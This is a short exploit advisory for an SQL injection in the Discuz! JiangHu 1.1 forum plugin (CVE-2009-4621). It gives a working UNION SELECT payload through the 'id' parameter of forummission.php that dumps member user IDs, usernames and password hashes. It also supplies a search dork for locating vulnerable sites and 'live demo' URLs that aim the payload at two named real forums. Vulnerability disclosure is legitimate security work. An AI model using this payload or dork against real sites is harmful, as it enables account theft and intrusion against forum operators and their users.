Discuz! Plugin JiangHu 1.1 - 'id' SQL Injection



EKU-ID: 17341 CVE: OSVDB-61855;CVE-2009-4621 OSVDB-ID:
Author: ZhaoHuAn Published: 2009-09-02 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


=========================================================
Discuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability
=========================================================

========================[Author]=========================

 [+] Founded 	: ZhaoHuAn
 [+] Contact	: ZhengXing[at]shandagames[dot]com
 [+] Blog	: http://www.patching.net/zhaohuan/
 [+] Date	: Feb, 9th 2009
 [+] Update	: Sep, 1th 2009

========================[Soft Info]======================

Software: Discuz! Plugin JiangHu Inn
Version	: 1.1
Vendor	: http://www.discuz.com
d0rk    : inurl:forummission.php



[-] Exploit:
[+] and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[-] SqlI PoC:
[+] http://target/[path]/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[+] Demo Live:
[-] http://www.palslp.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[-] http://bbs.sunspals.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--


/---------------------------------------------www.zhaohuan.net-------------------------------------------------\

                                            Greetz : Snda Security Team
                                                    & Normal is boring - -!

\--------------------------------------------------------------------------------------------------------------/

# milw0rm.com [2009-09-02]